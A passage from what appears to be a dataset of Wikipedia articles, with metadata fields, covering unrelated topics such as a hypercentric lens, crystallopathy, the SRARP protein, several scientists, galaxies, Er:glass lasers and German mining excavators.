"Biocides",
"Functional groups"
] |
63,832,562 | https://en.wikipedia.org/wiki/Hypercentric%20lens | A hypercentric or pericentric lens is a lens system where the entrance pupil is located in front of the lens, in the space where an object could be located. In a certain region, objects that are further away from the lens produce larger images than objects that are closer to the lens. This is in stark contrast to the behavior of the human eye or any ordinary camera (both entocentric lenses), where further-away objects always appear smaller.
The geometry of a hypercentric lens can be visualized by imagining a point source of light at the center of the entrance pupil sending rays in all directions. Any point on the object will be imaged to the point on the image plane found by continuing the ray that passes through it, so the shape of the image will be the same as the shadow cast by the object from the imaginary point of light. The closer an object gets to that point (the center of the entrance pupil), the larger its image will be.
This inversion of normal perspectivity can be useful for machine vision. Imagine a six-sided die sitting on a conveyor belt being imaged by a hypercentric lens system directly above, whose entrance pupil is below the conveyor belt. The image of the die would contain the top and all four sides at once, because the bottom of the die appears larger than the top.
See also
Entocentric lens
Telecentric lens
References
Photographic lenses
Machine vision | Hypercentric lens | [
"Engineering"
] | 293 | [
"Machine vision",
"Robotics engineering"
] |
63,834,055 | https://en.wikipedia.org/wiki/Personal%20media | Personal media are media of communication which are used by an individual rather than by a corporation or institution. They are generally contrasted with mass media which are produced by teams of people and broadcast to a general population. In other words, personal media allow individuals, as opposed to corporate entities, to contribute knowledge and opinion to the public. The term dates from the 1980s.
New technologies such as social media and self-publishing are creating a variety of modes for modern media. Marika Lüders suggests a two-dimensional model for classifying such media with one dimension being the degree of interaction between the senders and receivers; and the other dimension being the level of institutionalisation and professionalism.
Katherine Nashleanas links the concept of personal media to the notion of 'control' by an individual as opposed to a centralised authority. She argues that although personal media including the fax have been available to the general public since the 1960s, more recent technologies such as the smartphone confer greater control over content production and distribution to their users.
References
Digital media
Multimedia
New media
Social media
Social networks | Personal media | [
"Technology"
] | 217 | [
"New media",
"Digital media",
"Computing and society",
"Multimedia",
"Social media"
] |
63,834,727 | https://en.wikipedia.org/wiki/Crystallopathy | Crystallopathy is a harmful state or disease associated with the formation and aggregation of crystals in tissues or cavities, or in other words, a heterogeneous group of diseases caused by intrinsic or environmental microparticles or crystals, promoting tissue inflammation and scarring.
Composition
Crystallopathies can be associated with four main kinds of crystalline structures: liquid non-aggregating crystal solutions, amorphous nano-scale solid particles, crystalline micro-scale solid particles, and polycrystalline larger solid structures. They can be composed of various minerals, metabolites, proteins, and microparticles, including the following:
Location
In principle, crystal formation can happen anywhere in the body. Well-known places are excretory organs where concentrations get high easily, like in the biliary and urinary tracts, but crystalline structures are also formed in intracellular and extracellular spaces of tissues, like within the arterial wall in atherosclerosis.
For example, mechanical obstruction by mineral stones causes nephrolithiasis, urolithiasis, cholecystolithiasis, choledocholithiasis, docholithiasis, and sialolithiasis, and acute inflammation caused by crystals in joints causes gout and pseudogout.
Renal diseases are also common in crystallopathies, including:
Mechanisms
Local supersaturation is a common trigger of crystallization, and when the nucleus of the crystalline structure is formed, crystals can self-perpetuate and cause more crystallization and aggregation. Main mechanisms by which the formed crystals and aggregates cause pathological states and ultimately disease are acute necroinflammation, chronic tissue remodelling, and mechanical obstruction.
Necroinflammation is an autoamplifying process where crystals are toxic to cells (cytotoxicity) and cause cell death (necrosis and regulated cell death) and a local and systemic inflammatory response. Cytotoxicity includes actin depolymerization, free radical and reactive oxygen species synthesis, and autophagy. Crystals can also directly activate inflammation via Mincle receptors, calcium and potassium signalling, calpains, cathepsin beta, proteases, and NLPR3 inflammasomes.
Cells undergo cell death via three main mechanisms: necroptosis via RIPK1, FADD, RIPK3, and MLKL, ferroptosis via GPX4 suppression, system Xc suppression, and NAPDH loss, as well as apoptosis via RIPK1 and caspase 8. These distressed cells then excrete alarmins, proteases, and damage-associated molecular patterns including HMGB1, histones, mitochondrial DNA, demethylated DNA and RNA, ATP, uric acid, and double-stranded DNA, which further activates Toll-like receptors and inflammasomes. Finally, this activates the inflammatory response including the release of pro-inflammatory interleukin 1 alpha, interleukin 1 beta, cytokines, kinins, lipid inflammatory mediators, complement system activation, vasodilation, an increase in endothelial permeability and leukocyte influx, and pain.
Macrophages are key cells that try to remove crystals from tissues by phagocytosis. As part of the inflammatory response, they undergo polarization into a pro-inflammatory state called M1. Macrophages can ingest particles at most a few microns in diameter. If digestion of the crystalline material fails in the lysosomes however, macrophages undergo autophagy, form foam cells and giant cells, and try to do extracellular digestion in a process called frustrated phagocytosis.
Crystals do not always cause acute inflammation but instead lead to chronic tissue remodelling. This process is possible because crystals get shielded from pro-inflammatory processes by compartmentalization (e.g. granuloma formation, fibrosis, and wound-healing) or molecular coating, or because inflammatory responses are suppressed with direct anti-inflammatory signalling (e.g. CLEC12A and NETosis).
Crystals can attach to membranes via annexin II, CD44, and osteopontin.
Interventions
The most straightforward treatment of crystallopathies would be dissolving the crystals. Crystal dissolvents have been under research, for example with cyclodextrin in atherosclerosis. Another approach would be to modify the inflammatory pathways common for crystallopathies with treatments such as IL-1a and IL-1b antagonists, NLRP3-antagonists, or blockers of ferroptosis and necroptosis. For protein-based crystallopathy, pharmacologic chaperones, protein stabilizing small molecules, and protein refolding agents have been under consideration.
References
Human diseases and disorders
Pathology
Rheumatology
Nephrology
Crystals | Crystallopathy | [
"Chemistry",
"Materials_science",
"Biology"
] | 1,019 | [
"Crystallography",
"Crystals",
"Pathology"
] |
63,834,837 | https://en.wikipedia.org/wiki/SRARP | Steroid Receptor Associated and Regulated Protein (SRARP) in humans is a protein encoded by a gene of the same name with two exons that is located on chromosome 1p36.13. SRARP contains 169 amino acids and has a molecular weight of 17,657 Da.
Expression and function in breast cancer
SRARP is co-expressed with the estrogen receptor (ER) and androgen receptor (AR) in breast cancer. In the ER-positive breast cancer cells, SRARP is involved in the transcriptional activities of ER and has shown an interaction with ER using the transient transfection of cells with SRARP and ER constructs. In addition, in AR+ breast cancer cells, SRARP interacts with the endogenous AR protein and acts as a transcriptional corepressor of AR. Furthermore, the activation of either AR or ER negatively regulates SRARP expression in breast cancer cells.
Tumor suppressor function in malignancies
SRARP and HSPB7 are gene pairs that are positioned 5 kb apart on chromosome 1p36.13. It is notable that the loss of chromosome 1p36.1 is common in malignancies, occurring in 34% of tumors SRARP and HSPB7 are broadly inactivated in malignancies by epigenetic silencing, copy-number loss, and less frequently by somatic mutations. In addition, overexpression of SRARP or HSPB7 leads to tumor suppressor effects in cancer cell lines. Another similar molecular feature between SRARP and HSPB7 is the fact that both of these proteins interact with the 14-3-3 protein. Furthermore, SRARP is a potential cancer biomarker and SRARP inactivation predicts poor clinical outcome in malignancies and adjacent normal tissues using the analysis of large genomic datasets
References
Proteins | SRARP | [
"Chemistry"
] | 389 | [
"Biomolecules by chemical classification",
"Proteins",
"Molecular biology"
] |
63,836,450 | https://en.wikipedia.org/wiki/Joan%20van%20der%20Waals | Joan Henri van der Waals (2 May 1920 – 21 June 2022) was a Dutch physicist. He was professor of experimental physics at Leiden University between 1967 and 1989. He specialized in molecular physics and clathrate hydrates. One of Van der Waals's most significant contributions to the study of hydrates was a series of papers between 1953 and 1958, which eventually culminated in the 1959 publication of his paper on the canonical partition function for clathrates, along with J. C. Platteeuw. To create this partition function, van der Waals made a number of simplifying assumptions, most prominently that neighboring guest gas molecules cannot interact and there is a maximum of one guest per cage.
Early life
Van der Waals was born on 2 May 1920 in Amsterdam. A book on the Bohr model sparked his interest in physics. After finishing his high school in Amsterdam he moved to London to work as an intern-apprentice in a laboratory. When he returned to the Netherlands he started a combined study of physics, chemistry and maths at the University of Amsterdam. With the German invasion of the Netherlands in May 1940, Van der Waals was called for military service for the mounted artillery. He was made prisoner of war but was allowed to return to his studies in June 1940. In 1942, Van der Waals completed the long-distance tour-skating event, the Elfstedentocht. In 1943 he refused to sign the and went into hiding. He joined the underground courier service Rolls Royce. One of his activities was to make contact from The Hague with already liberated parts of the Netherlands to exchange communication. Van der Waals was caught by the authorities three times during the war-period, but managed to escape each time. Near the end of the war he went into hiding with family members living in the Veluwe region. When this area was liberated he was recruited as a translator for the Alsos Mission because he was able to speak German and English. In this capacity he was part of the liberation of Utrecht and saw the German technological facilities in Hook of Holland.
Career
After the war ended, Van der Waals finished his studies at the University of Amsterdam in October 1945. He then started working for the Koninklijke Shell Laboratorium Amsterdam. He obtained his doctorate at the University of Groningen in 1950, with a thesis titled Thermodynamic Properties of Mixtures of Alkanes Differing in Chain Length. In the 1950s, Van der Waals developed insights in the description of clathrates and hydrates related to noble gas compound, resulting in the 1959 Van der Waals–Platteeuw clathrate hydrate theory. Van der Waals was appointed professor of experimental physics at Leiden University in 1967, and retired in 1989. He specialized in molecular physics.
In 1962, Van der Waals received the Bourke Award of the Royal Society of Chemistry. Van der Waals was elected a member of the Royal Netherlands Academy of Arts and Sciences (KNAW) in 1971. He served on the board of the KNAW between 1984 and 1987. He has been an honorary member of the Royal Netherlands Chemical Society since 1998. Van der Waals was appointed Knight in the Order of the Netherlands Lion.
Van der Waals has been involved in the conservation and restoration of the Trippenhuis, the seat of the KNAW, since the 1980s.
Personal life
Van der Waals was married to Liesbeth van der Waals (1920–2014), with whom he had three children. In 1967 the pair separated. Van der Waals was the first cousin, twice removed, of Dutch Nobel Prize–winning physicist Johannes Diderik van der Waals. He was an avid sailor and has made trips to the polar circle and Argentina.
Van der Waals turned 100 on 2 May 2020, and died on 21 June 2022, at the age of 102.
References
1920 births
2022 deaths
20th-century Dutch physicists
Dutch men centenarians
Dutch prisoners of war in World War II
Dutch resistance members
Experimental physicists
Knights of the Order of the Netherlands Lion
Academic staff of Leiden University
Members of the Royal Netherlands Academy of Arts and Sciences
Royal Netherlands Army personnel of World War II
Scientists from Amsterdam
University of Amsterdam alumni
University of Groningen alumni
World War II prisoners of war held by Germany | Joan van der Waals | [
"Physics"
] | 871 | [
"Experimental physics",
"Experimental physicists"
] |
63,836,749 | https://en.wikipedia.org/wiki/NGC%202906 | NGC 2906 is a spiral galaxy in the constellation Leo. It is circa 120 million light years from Earth, which, given its apparent dimensions, means that NGC 2906 is about 75,000 light years across. It was discovered by William Herschel on December 28, 1785.
The galaxy is characterised by a normal star formation rate, which has been calculated to be 0.8 per year. The total mass of the galaxy is estimated to be . A total of 241 HII regions have been identified in the galaxy.
One supernova has been observed in NGC 2906, SN 2005ip. The supernova was discovered by T. Boles on November 6, 2005, with a 0.35m refractor, with an estimated apparent magnitude 15.5 and was identified as a type II supernova, probably within a few weeks past explosion. As the supernova declined in brightness, it reached a plateau that lasted for a bit more than two years and its spectrum became dominated by narrow lines (IIn), an unusual feature of supernovae, that was attributed to the interaction of the supernova with dust located around it. It is also possible that the supernova created dust.
NGC 2906 is member of a group of galaxies, the NGC 2894 group. Other galaxies identified as members of the cluster are NGC 2882, NGC 2894, and IC 450.
References
External links
Intermediate spiral galaxies
Leo (constellation)
2906
05081
27074
Astronomical objects discovered in 1785
Discoveries by William Herschel | NGC 2906 | [
"Astronomy"
] | 309 | [
"Leo (constellation)",
"Constellations"
] |
63,838,644 | https://en.wikipedia.org/wiki/Edward%20Marion%20Augustus%20Chandler | Edward Marion Augustus Chandler (April 10, 1887 – March 22, 1973) was the second African American to receive a Ph.D. in chemistry while studying at University of Illinois at Urbana–Champaign and was a founding faculty member at Roosevelt University in Chicago.
Early life and education
Chandler was the first of eight children born to Annie M. (née Onley) (1861–1909) and Henry Wilkins Chandler (1852–1938) in Ocala, Florida. Chandler's mother was a teacher from New York, and Chandler's father was the first Black graduate of Bates College in Maine who was an early African American lawyer, Florida state senator, and Republican Party Delegate.
After completing high school, Chandler attended Teachers' College of Howard University where he received his A.B. in Education in 1913. He then went to Clark University and obtained his M.S. in chemistry in 1914. His master thesis was titled On the dynamics of ester by acids. He completed his Ph.D. in chemistry in 1917 under the guidance Roger Adams at the University of Illinois which made him the second African American to earn a Ph.D. in chemistry in the United States after St. Elmo Brady. His PhD thesis is titled "The Molecular rearrangement of Carbon Compounds".
Career
After completing his Ph.D., he worked in the dye firm of Dicks, David and Heller Company until 1921. Then he worked at the pharmaceutical manufacturer Abbott Laboratories. In 1924 Chandler left Abbott to become a consulting chemist in Lake County, Illinois.
In 1945 Chandler was among the founding faculty of the new racially integrated Roosevelt College (now Roosevelt University). Other pioneers at the school included sociologist St. Clair Drake, modern dancer Sybil Shearer, and sociologist Rose Hum Lee. Chandler taught there for twenty years.
Professional memberships
American Chemical Society
Fellowship in Science
Phi Lambda Upsilon
Sigma Xi
Family
He married Arstella May Thorton on September 2, 1915. They had four children together: Dean T. Chandler (1917), Helen Marie Chandler (1920), Ruth Annette Chandler (1922), and Beverly Jane Chandler (1925).
See also
St. Elmo Brady - first African-American to obtain a PhD in chemistry in US (1916)
Percy Lavon Julian - third African-American to obtain a PhD in chemistry in US (1931)
Marie Maynard Daly - first female African-American to obtain a PhD in chemistry in US (1947)
List of African-American inventors and scientists
References
1887 births
1973 deaths
African-American chemists
20th-century American chemists
Clark University alumni
Howard University alumni
American organic chemists
Scientists from Florida
Scientists from Illinois
People from Ocala, Florida
20th-century African-American scientists
Chemists from Florida
University of Illinois College of Liberal Arts and Sciences alumni | Edward Marion Augustus Chandler | [
"Chemistry"
] | 563 | [
"Organic chemists",
"American organic chemists"
] |
63,838,721 | https://en.wikipedia.org/wiki/Bulgarian%20names%20in%20space | There are a number of objects in the solar system that have been named after Bulgarian people or places. Many of these are craters on the terrestrial planets but asteroids and exoplanets have also received Bulgarian names.
Venus
Budevska crater
Zdravka crater
Mars
Byala crater
Dulovo (crater)
Asteroids
2575 Bulgaria
4364 Shkodrov
11856 Nicolabonev
225232 Kircheva
253 Mathilde
Maritsa crater
References
External links
Българските имена в Космоса
Space program of Bulgaria
Astronomical nomenclature by country | Bulgarian names in space | [
"Astronomy"
] | 125 | [
"Astronomy stubs"
] |
63,839,346 | https://en.wikipedia.org/wiki/Susan%20Goldstine | Susan Goldstine is an American mathematician active in mathematics and fiber arts. She is a professor of mathematics at St. Mary's College of Maryland, and (for 2019–2022) the Steven Muller Distinguished Professor in the Sciences at St. Mary's College.
Education and career
Goldstine graduated summa cum laude from Amherst College in 1993. She completed a Ph.D. in mathematics at Harvard University in 1998. Her dissertation, Spin Representations and Lattices, was supervised by Benedict Gross.
After postdoctoral and visiting assistant professorships at McMaster University, Ohio State University, and Amherst College, she joined the St. Mary's College faculty in 2004.
Contributions
Goldstine has made and exhibited many pieces of mathematical art, often involving textiles. A set of bead crochet jewelry pieces by her visualizing the map coloring problem on three different manifolds won the prize for "best textile, sculpture, or other medium" in the art show of the 2015 Joint Mathematics Meetings.
She is the coauthor of the book Crafting Conundrums: Puzzles and Patterns for the Bead Crochet Artist (with Ellie Baker, A K Peters / CRC Press, 2014).
Combining her interests in mathematics and fiber arts she is one of 24 mathematicians and artists who make up the Mathemalchemy Team.
Personal life
Goldstine is the granddaughter of teacher and author Bel Kaufman and the great-great-granddaughter of Sholem Aleichem.
References
External links
Home page
Year of birth missing (living people)
Living people
20th-century American mathematicians
21st-century American mathematicians
Recreational mathematicians
Amherst College alumni
Harvard Graduate School of Arts and Sciences alumni
St. Mary's College of Maryland faculty
Mathematical artists
20th-century American women mathematicians
21st-century American women mathematicians | Susan Goldstine | [
"Mathematics"
] | 361 | [
"Recreational mathematics",
"Recreational mathematicians"
] |
76,944,753 | https://en.wikipedia.org/wiki/Craig%20Dunn | Craig P. Dunn is an American professor in the fields of business and sustainability. He is a professor in the management department at Western Washington University, where from 2016 to 2023 he served as Wilder Distinguished Professor of Business and Sustainability, an endowed professorship. Dunn attended California State University, Long Beach for his Bachelor of Science degree in business administration, California State University, Bakersfield for his Master of Business Administration, and Indiana University Bloomington for his Doctor of Philosophy. He formerly worked for San Diego State University, where he is now an associate professor, emeritus.
At Western Washington University, he served as dean of the College of Business and Economics from 2013 to 2016 before gaining his professorship. He was succeeded as dean by Scott Young. Dunn also serves on the faculty of the Institute for Energy Studies, on the Graduate Faculty Governance Council, and on the Lesbian, Gay, Bisexual & Transgender Advocacy Council. In 2021, Dunn had the highest salary of any university employee other than the president, Sabah Randhawa.
References
External links
Craig Dunn – WWU News
Living people
Year of birth missing (living people)
Missing middle or first names
American academics
American businesspeople
American education businesspeople
American energy industry businesspeople
Business school deans
Businesspeople in education
Energy economists
Sustainability scientists
California State University, Long Beach alumni
California State University, Bakersfield alumni
Indiana University Bloomington alumni
San Diego State University faculty
Western Washington University faculty | Craig Dunn | [
"Environmental_science"
] | 282 | [
"Sustainability scientists",
"Environmental scientists"
] |
76,952,322 | https://en.wikipedia.org/wiki/4C%20%2B29.30 | 4C +29.30 is an elliptical galaxy located in Cancer constellation. Its redshift is 0.064840 which corresponds to a light travel time of 850 million light-years from Earth. It is a wide-angled tailed radio galaxy (WAT) and a Seyfert galaxy.
An active galaxy
The nucleus of 4C +29.30 is found to be active. It is specially classified as a Fanaroff-Riley Class I (FR-I) radio galaxy producing an optical radio jet, although it shows characteristics of a Fanaroff-Riley Class II. 4C +29.30 shows existence of weak extended emission, which has an angular size of ~520 arcsec (639 kpc) embedded within the galaxy with a compact edge-brightened double-lobed source of 29 arcsecs (36 kpc). 4C +29.30 has been catalogued as an infrared point source by IRAS, WISE and the Two Micron All Sky Survey (2MASS).
The galaxy shows a complex X-ray morphology which shows the main features of a nucleus, a jet, hotspots and lobes which was detected during the snapshot 8 ks Chandra Observation by Gambil et al. (2003). Its nucleus is found to have absorbed (N H ~= 3.95+0.27 -0.33 × 1023 cm-2) and an unabsorbed luminosity of L 2-10 keV ~= (5.08 ± 0.52) × 1043 erg s-1, showing a characteristic of a Seyfert Type 2. Furthermore, it shows an early-type morphology, which has a moderate radio luminosity of ~10 ergs 1, presenting signatures of jet reactivation.
4C +29.30 is particularly a subject of interest since there has been multiple episodes of activity revealed from morphology and by spectral properties of radio emission over broad range of scales. It was first studied by van Breugel et al. (1986) who found optical line emitting gas to ~20 arcsec north of nucleus, and adjacent to the radio jet along a position angle PA = 24°. There is evidence of the radio jet interacting with dense extranuclear gas, suggesting the recent activity in 4C +29.30 after merging with a gas-rich disk galaxy.
A 4.3 kpc x 6.2 kpc extended emission in ionized gas can be found in 4C +29.30, displaying structures that resembles rotated disks, spiral arms and bars resembling a spiral galaxy of type Sc. The galaxy also displays a dust lane passing through its central region similar to Centaurus A. According to Jamrozy et al. (2007), a low-surface brightness, radio emission extending to ~600 kpc has been detected and studied, which its structure is characterized by a steep radio spectrum. The age of the small-scale radio structure embedded within the extended radio emission, is estimated to be ≲ 100 Myr, with the inner double knots of a spectral age of ≲ 33 Myr being resolved to two separate nuclear knots of spectral ages of ~15 yr and ~70 yr.
Observation of 4C +29.30
Between January 12 and March 15, 2016, 4C +29.30 was observed by the Integral Field Unit (IFU) of the Gemini Multi-object Spectrograph, mounted on a Gemini North Telescope. A 'One-slit' model is used, with a rectangular view of ≈ 3.5 arcsec × 5.0 arcsec which corresponds to 4.3 x 6.2 kpc2 at the galaxy. At least 15 exposures of 1140s were obtained, slightly shifted and dithered up to 0.8 arcsec for both axes, to correct detector effects after the combination of frames.
For the spectral with wavelength coverage in range of ʎ4500-7300 and centered at ʎ5900, this were obtained through the use of B600+_G5307 grating and IFU-R mask. The spectral resolution is found to be R~3600 at ~ʎ3700 (~83 km1), derived from the full width half-maximum (FWHM) of the CuAr emission lines. The spectral dithering was also performed with a maximum separation of 102.5 Å between exposures. These data reduction were performed through using IRAF packages provided by the Gemini Observatory, with the procedure consisting of sky and bias subtraction, flat-fielding, trimming, wavelength and relative flux calibration, building of the datacubes, final alignment and average combination with an average sigma clipping into the final datacube, which has a spatial binning of 0.1 x 0.1 arcsec 2.
Estimating ionized gas properties of 4C +29.30
Thanks to the data provided, researchers were able to calculate the total mass of ionized hydrogen gas in 4C +29.30, which the total mass of emitted ionized hydrogen gas is M ≈ 2.3 x 10 (5), where L41(H α) is the H α luminosity in units of erg s−1 and n3 is the electron density in units of 103/ cm3. The H α luminosity is calculated via correcting the emitted flux for reddening assuming the Cardelli et al. (1989) reddening law where RV = 3.1. The total amount of the mass outflow rate of 4C +29.30 is obtained with the ~3 kpc radius.
For the mass outflow rate and outflow kinetic power in the southern knot (SK) with a high blueshift of (≈ -600 km/s -1) and the redshifted northern knot (NK) at ~1"4 from the nucleus, researchers estimated them via adopting a biconical geometry for the outflowing gas. This can be calculated as Mout = 1.4ne mp vout A F, where mp = 1.7 x 10 (-24)g is proton mass, ne is electron density, vout is the outflow velocity which is the cone cross-section (base), f is the filling factor and the factor of 1.4 refers to elements that is heavier compared to hydrogen. Through the assumption of geometry, they were able to obtain a cross-area of the outflow of A = 4.6 x 10 (43) for both regions. The total mass outflow rates are then calculated for each separate knot, using the likely inclination of 40°. This gives a total mass outflow rate calculation of Mout = 25.4 (+11.5 divided by -7.5) M⊙/yr and an outflow kinetic of E = 8.1 (+10.7 divided by -4.0) erg/s. Compared to ionized gas outflows mass rates in seyfert galaxies in the range 0.1–10 M⊙/yr, the outflows in 4C +29.30 have higher mass of ionized gas.
Through sampling all the data collected by the researchers, this proves that the ionized gas mass outflow rate and the outflow kinetic power in 4C +29.30 is higher than other estimations in radio galaxies like 3C 293 and PKS 1345+12, but with its kinetic power compatible to those obtained for ESO 428-G14.
Black hole
The supermassive black hole in 4C +29.30 has an estimated mass of 100 million times the Sun. A further study shows there are two jets of particles, speeding millions of miles per hour away from the black hole, each of them showing larger areas of radio emission located outside the galaxy. A pool of hot gas is around the black hole, in which some of the material will be consumed and the magnetized whirlpool triggers more output in return to the radio jet. It is suggested by heating up the gas in clumps and dragging cool gas along, the jets deprive the black hole of its fuel supply, thus making it hungry.
4C +29.30 also contains a dusty torus, containing dust and gas, which blocks optical light produced near the black hole. This suggests 4C +29.30 belongs to hidden/buried AGNs, a new class emerging among the Swift/BAT hard X-ray-selected AGNs.
References
Radio galaxies
Elliptical galaxies
Cancer (constellation)
4C objects
Seyfert galaxies
Principal Galaxies Catalogue objects
IRAS catalogue objects | 4C +29.30 | [
"Astronomy"
] | 1,761 | [
"Cancer (constellation)",
"Constellations"
] |
76,952,693 | https://en.wikipedia.org/wiki/Caroline%20McCaw | Caroline McCaw is a New Zealand design academic, and is a full professor at the Otago Polytechnic, specialising in incorporating storytelling and cultural values into design communication.
Academic career
McCaw completed Master of Fine Arts at Otago Polytechnic, with a thesis based around a location-specific picnic event held at four locations simultaneously and incorporating a webcast from Amsterdam. She also completed a PhD titled Identifying the Value of the Local Through Site-Specific Contemporary Art Projects in New Zealand at the Griffith University in Australia in 2016. Her thesis was supervised by Pat Heffie and Leoni Schmidt. McCaw then joined the faculty of the Otago Polytechnic, rising to full professor.
McCaw was awarded a Ako Sustained Teaching Excellence award in 2014. The citation noted that she "excels in using collaborative processes to engage learners and connect her teaching to community development and industry outcomes". In 2016 she was awarded a Fulbright Fellowship to become a Scholar-in-Residence at SUNY Canton.
In 2015, McCaw collaborated with Jane Malthus, Glen Leyton and Margo Barton to produce an exhibition of Dunedin fashion, A Darker Eden, held at Silo Park in Auckland. The display built on Dunedin's neo-Gothic reputation, had over 3000 visitors, and featured fashion by Otago Polytechnic graduates alongside established labels NOM*d, Mild Red, Tanya Carlson and Company of Strangers, and a section on iD Dunedin Fashion Week. McCaw and Leyton also collaborated with students to produce an exhibition at Tūhura Otago Museum on WWI nurses from Otago.
Selected works
Malthus, Jane, McCaw, Caroline, Glen, Leyton and Barton, Margo. A Darker Eden, exhibition at Silo Park, Auckland, 13 Feb – 1 March 2015
McCaw, C., Glen, L., Oliver, M., Wilson, J., and Scott, C. Who Cared? Otago Nurses in WWI, exhibition at Otago Museum, 26 September 2015 – 31 January 2016
Malthus, J., McCaw C., Leyton, G., Barton M. (2015) Interplay and Inter-place: A collaborative exhibition addressing place-based identity in fashion design. International Association of Design Research Societies, Brisbane, Australia, 2 – 5 November
References
External links
Caro McCaw - Tertiary Teaching Excellence Award Winner, 7 July 2014, via YouTube
New Zealand academics
New Zealand women academics
New Zealand designers
Communication design
Academic staff of Otago Polytechnic
Living people
Year of birth missing (living people)
Otago Polytechnic alumni
Griffith University alumni | Caroline McCaw | [
"Engineering"
] | 504 | [
"Design",
"Communication design"
] |
76,953,328 | https://en.wikipedia.org/wiki/Er%3Aglass%20laser | An Er:glass laser (erbium-doped glass laser) is a solid-state laser whose active laser medium is erbium-doped glass. Ytterbium (Yb) is sometimes added to these lasers to improve their efficiency. Er:glass lasers emit light in the infrared region of the electromagnetic spectrum, often in the range of 1530–1560 nanometers.
Applications
The specific wavelengths that Er:glass produces (approximately 1500 nanometer) coincide with a strong absorption peak for water. Since the human cornea and lens contain a high water content, they effectively absorb the laser radiation, thereby reducing the amount of light transmitted to the retina. The retina is the light-sensitive layer of the eye and is particularly vulnerable to damage from high-powered lasers. Consequently, Er:glass lasers are classified as relatively eye-safe compared to lasers operating at wavelengths that reach the retina. This relative eye safety allows Er:glass lasers to be used in many different applications where eye safety is preferable or necessary, such as in medicine and in public areas.
Rangefinders
In addition to being relatively eye-safe, the 1500 nanometer wavelength that Er:glass lasers produce is also an ideal wavelength for laser rangefinders. It offers good transparency in the atmosphere, allowing the beam to travel long distances with minimal degradation. Additionally, this wavelength coincides with the peak sensitivity of certain infrared photodetectors that can operate at room temperature (including both indium gallium arsenide (InGaAs) and germanium (Ge)-based photodiodes).
The Er:glass lasers used in rangefinders typically emit short, high-energy pulses (Q-switched pulses) ranging from 1 to 10 millijoules. These lasers can measure distances up to 10 kilometers. The repetition rate, which refers to the frequency at which these pulses are emitted, depends on the pumping mechanism. Flash-lamp-pumped devices without active cooling can only produce pulses every few seconds. In contrast, diode-array pumped systems offer much faster repetition rates, reaching up to 10–20 hertz range.
Laser skin resurfacing
Er:glass lasers are used for non-ablative laser skin resurfacing procedures, such as Fraxel Restore. The 1540 nanometer wavelength is highly absorbed by water molecules within the skin tissue. This absorption heats the water molecules, creating controlled thermal damage (thermolysis) in the upper dermis. This thermal damage stimulates the skin's natural wound healing response, promoting the production of new collagen fibers. By stimulating collagen production, Er:glass laser treatment aims to improve the appearance of fine lines, wrinkles, and uneven skin tone without completely removing the top layers of skin. This approach is considered to be a gentler alternative to ablative laser resurfacing techniques, typically resulting in shorter healing times and a reduced risk of scarring.
References
Solid-state lasers
Medical equipment
Laser medicine
Erbium | Er:glass laser | [
"Chemistry",
"Biology"
] | 614 | [
"Medical equipment",
"Solid state engineering",
"Solid-state lasers",
"Medical technology"
] |
76,953,474 | https://en.wikipedia.org/wiki/Type%20SRs%208000%20bucket-wheel%20excavator | The Type SRs 8000 or less commonly known as the SRs 8000-class, is a family of bucket-wheel excavators known for being one of the largest terrestrial vehicles ever made by man, with Bagger 293 its - "lead vessel" - being the largest ground vehicle in history. The Type SRs 8000 classification was coined by TAKRAF to describe specifically, Bagger 293, although it is unclear if this extends to its other "sibling vehicles" within the same bulk.
Whilst the "Bagger" family may indicate a copy/series of the same vehicle type, it is more of a loose denominator to group any BWEs of similar bulk, length, height and size within the Hambach surface mine. Indeed, some of the Baggers created aren't of the same size, construction period or even in the same built manufacturer. Bagger 293 and 288 for example, was constructed by TAKRAF and Krupp respectively.
Specifications
As aforementioned, the one factor that unites all of them are their size. All members of the Type SRs 8000 weigh at the bare minimum of over 7,000 tons. The smallest and oldest of the family, Bagger 281 (built in 1958) weigh over 7,800 tons, although the average weight range is around 13,000 tons. Likewise, all members reach lengths of over 200 meters and require a small crew of five. Such a size would mean that these vehicles would have its own on-board toiletry and kitchenette rooms.
As BWEs, the Type SRs 8000s are all externally powered by a nearby coal production plant with an internal 6,413 kW (8,600 hp) powered electric motor to keep the machine operating smoothly. On average, all Baggers require a total output 16.56 MW (22,207 hp) of power to function with all-systems running. Their primary goal as BWEs, is in excavating lignite coal in Germany for processing to be turned into energy or 240,000 cubic metres of overburden daily.
Currently, all Type SRs 8000s are in-service. They are Bagger 281 (1958), Bagger 285 (1975), Bagger 287 (1976), Bagger 288 (1978), Bagger 291 (1993) and Bagger 293 (1995).
Gallery
See also
List of largest machines
Bucket-wheel excavators
Landships
Bagger 288
Bagger 293
References
Bucket-wheel excavators
Coal mining in Germany
RWE
Buildings and structures in Rhein-Erft-Kreis
Economy of North Rhine-Westphalia
Takraf GmbH | Type SRs 8000 bucket-wheel excavator | [
"Engineering"
] | 537 | [
"Mining equipment",
"Bucket-wheel excavators"
] |
76,953,497 | https://en.wikipedia.org/wiki/Type%20Es%203750%20bucket%20chain%20excavator | The Type Es 3750 or simply the Es 3750 is a series of bucket chain excavators built by TAKRAF and used in Germany. According to TAKRAF, they boast that the Type Es 3750 is the largest bucket chain excavators in the world. Type Es 3750s are notable for being always used in conjunction with the Overburden Conveyor Bridge F60, another absurdly large land vehicle.
Specifications
The Type Es 3750 are incredibly immense digging vessels, the largest of its kind according to TAKRAF. Each Type Es 3750 has the total length of , a height of and a weight of . The cutting height of the BCE's chain boom is to , whilst its cutting depth is to . In total, the chain boom is capable of excavating a maximum capacity of 14,500 m3/h. The buckets itself is reinforced by 5 to 10 mm steel plates to prevent deformation and wear-and-tear.
A unique design choice for the Type Es 3750 is the presence of two excavator's control cockpit, each spraying outwards on the left and right side of the machine. Given that it predominantly moves side-to-side with the F60, this is to be expected. Likewise, it also possess a small complement of men of around 2–5. Another unique feature is that the Type Es 3750 runs on rails. Since it is largely grouped closely with the F60, the Type Es 3750 share the same gauge as the F60 - . Likewise, the vehicles share their power source with the F60 and the nearby external coal power plant and therefore, moves the same speed as the F60.
Operations
The Type Es 3750 was built in almost exactly the same time as the F60s during 1978 in East Germany. Each F60 were to be expected to be accompanied by two Type Es 3750 to assist the machine in transferring overburden and lignite coal. One Type Es 3750 is purposed to excavate the topside whilst another is used to excavate the depths. Excavated materials would be transported on side conveyors towards the F60 for the materials to be properly redistributed. As there were originally five F60s, a total of 10 Type Es 3750 BCEs were built, but with the retirement of one of the F60s in Lichterfeld-Schacksdorf, only 8 remain in service.
Gallery
References
Engineering vehicles
Mining equipment
Surface mining
Surface mines in Germany
